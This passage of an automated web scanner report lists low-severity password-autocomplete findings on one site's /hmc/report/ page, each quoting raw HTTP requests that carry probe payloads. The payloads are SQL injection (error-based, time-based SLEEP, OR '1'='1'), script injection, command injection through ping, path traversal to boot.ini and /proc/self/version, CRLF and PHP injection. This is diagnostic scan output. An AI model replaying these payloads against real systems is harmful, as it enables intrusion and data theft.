...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.15. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.16. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDBEKTwvc2NyaXB0Pg%3d%3d HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDBEKTwvc2NyaXB0Pg%3d%3d" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.17. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%3E%3Cnet%20sparker=netsparker(0x000022)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x000022)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.18. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.19. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.20. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../boot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.21. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%0D%0Ans:netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.22. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/version HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.23. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000A)%3C%2Fscript%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000A)%3C%2Fscript%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.24. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.25. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=javascript:netsparker(0x00002E) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=javascript:netsparker(0x00002e)" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.26. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2BNSFTW%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2BNSFTW%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.27. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000008%2529%253C%252Fscript%253E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000008%2529%253C%252Fscript%253E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.28. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='+OR+'1'%3d'1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'1'%3d'1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.29. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.30. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=javascript:netsparker(0x000035) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=javascript:netsparker(0x000035)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.31. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.32. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
